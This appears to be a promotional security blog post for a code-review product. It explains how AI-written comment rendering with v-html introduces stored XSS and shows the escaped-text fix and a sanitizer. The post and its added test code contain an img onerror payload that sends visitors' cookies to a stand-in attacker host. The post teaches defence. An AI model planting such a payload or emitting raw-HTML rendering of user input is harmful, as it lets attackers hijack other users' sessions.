Jun 14, 2026

One comment that steals every login

AI renders user comments as raw HTML, so a comment containing a script tag runs on every visitor's browser — stealing sessions. This is XSS, and the fix is one line.


You asked AI to show user comments. They display, you shipped. What you actually shipped lets one user post a comment that runs code on every other visitor’s browser — and quietly steals their sessions.

What you shipped

The comment is rendered as HTML instead of text:

Spot the bug

v-html (and React’s dangerouslySetInnerHTML) takes a string and injects it as live markup. So whatever a user typed becomes part of your page — including tags and scripts.

How anyone exploits it

They post a “comment” that’s actually code:

<img src=x onerror="fetch('https://evil/?c='+document.cookie)">

The image fails to load, the onerror fires, and now their script runs in the browser of everyone who views that comment — sending each visitor’s session cookie to the attacker. One comment, every viewer.

Why you won’t catch it

You test by typing normal comments, which render fine. The payload only does something when the text contains markup — which you’d never type and a normal test never includes.

Why AI does it

When the goal is “render this comment,” v-html is the most direct tool — it shows whatever you give it. The distinction between displaying text and executing markup is exactly the thing the happy path glosses over.

The fix is one line

Render as text. Frameworks escape it for you:

The fix

<div>{{ comment }}</div>

Now <img onerror=...> shows up as literal characters, not a running tag. If you genuinely need rich text, sanitize with a library like DOMPurify first — never trust raw input.
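To make the difference concrete, here is an added example (not code from the post or from Velify) that models what a template emits for {{ comment }} versus v-html="comment", and a small regression check that feeds markup through the rendering path, since a test that only types a plain comment never exercises it. The names escapeHtml, renderComment and hasLiveMarkup are ours; the probe string is constructed to match the comment shown above.

```javascript
// Added example, not part of the original post. Models the two ways a user
// comment can reach the page and provides a check that a test suite can run
// against the rendered output. All function names here are our own.

// The escaping a framework applies for text interpolation ({{ comment }}).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// raw: false  -> what <div>{{ comment }}</div> produces (text, escaped)
// raw: true   -> what <div v-html="comment"></div> produces (live markup)
function renderComment(comment, { raw = false } = {}) {
  return `<div>${raw ? comment : escapeHtml(comment)}</div>`;
}

// Regression check for the rendering path: does anything inside the wrapper
// still contain a tag carrying an on* event handler, or a <script> element?
// Escaped output never contains a literal "<", so it passes; raw output of a
// markup-bearing comment fails.
function hasLiveMarkup(html) {
  const inner = html.replace(/^<div>|<\/div>$/g, "");
  return /<[a-z][^>]*\son\w+\s*=/i.test(inner) || /<script\b/i.test(inner);
}

// Constructed probe with the same shape as the comment discussed in the post.
const probe =
  '<img src=x onerror="fetch(\'https://evil/?c=\'+document.cookie)">';

// Returns true when the escaped path is safe and the raw path is not,
// i.e. the check actually distinguishes the two renderings.
function checkRenderingPaths() {
  const safe = !hasLiveMarkup(renderComment(probe));
  const unsafe = hasLiveMarkup(renderComment(probe, { raw: true }));
  return safe && unsafe;
}
```

Drop a probe like this into the test for any component that displays user text; a plain "hello" comment passes both paths and tells you nothing.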

Check your app

  • Search for v-html, dangerouslySetInnerHTML, innerHTML, outerHTML, document.write.
  • Any of them fed user-controlled data is an XSS hole.
  • If rich HTML is required, make sure it passes through a sanitizer (DOMPurify) before rendering.

The bigger problem

A senior dev flinches at v-html on user data. But if nobody senior reads the code, it ships — it works in every test, because every test types a plain comment. The author and reviewer are the same model with the same blind spot.

That’s the gap Velify is built to close: it reads your project and flags exactly this, in plain language, no terminal.

Join the early list at getvelify.app →
